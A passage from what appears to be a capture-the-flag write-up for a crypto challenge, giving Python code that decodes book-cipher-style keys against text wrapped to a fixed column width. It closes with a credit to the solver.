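    "the quick brown fox jumps over the lazy dog",
    "pack my box with five dozen liquor jugs",
]
# Constructed keys, written against the 23-column layout of PARAGRAPHS.
KEYS = [(1, 1, 9), (1, 2, 6), (2, 2, 2), (2, 1, 4)]


def layout(paragraphs, width):
    """Wrap each paragraph to `width` columns, the way a viewer would render it."""
    return [textwrap.wrap(p, width) for p in paragraphs]


def decode(pages, keys):
    """Resolve each key to one letter; '?' marks a key that falls outside the layout."""
    out = []
    for para, line, letter in keys:
        if min(para, line, letter) < 1:
            out.append("?")
            continue
        try:
            # Assumption: the letter count skips spaces.
            letters = pages[para - 1][line - 1].replace(" ", "")
            out.append(letters[letter - 1])
        except IndexError:
            out.append("?")
    return "".join(out)


if __name__ == "__main__":
    for width in (23, 15, 80):
        print(width, decode(layout(PARAGRAPHS, width), KEYS))
```

Only the 23-column layout the keys were written for recovers the word; narrower wrapping silently yields wrong letters and wider wrapping leaves keys pointing at lines that no longer exist.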
The Read read Read crypto challenge was solved only by our redqueen AN3M0N1. Feel free to connect with her on Twitter (Kaka Sheidu) or on LinkedIn (Kaka Sheidu).
Greeting From Muzec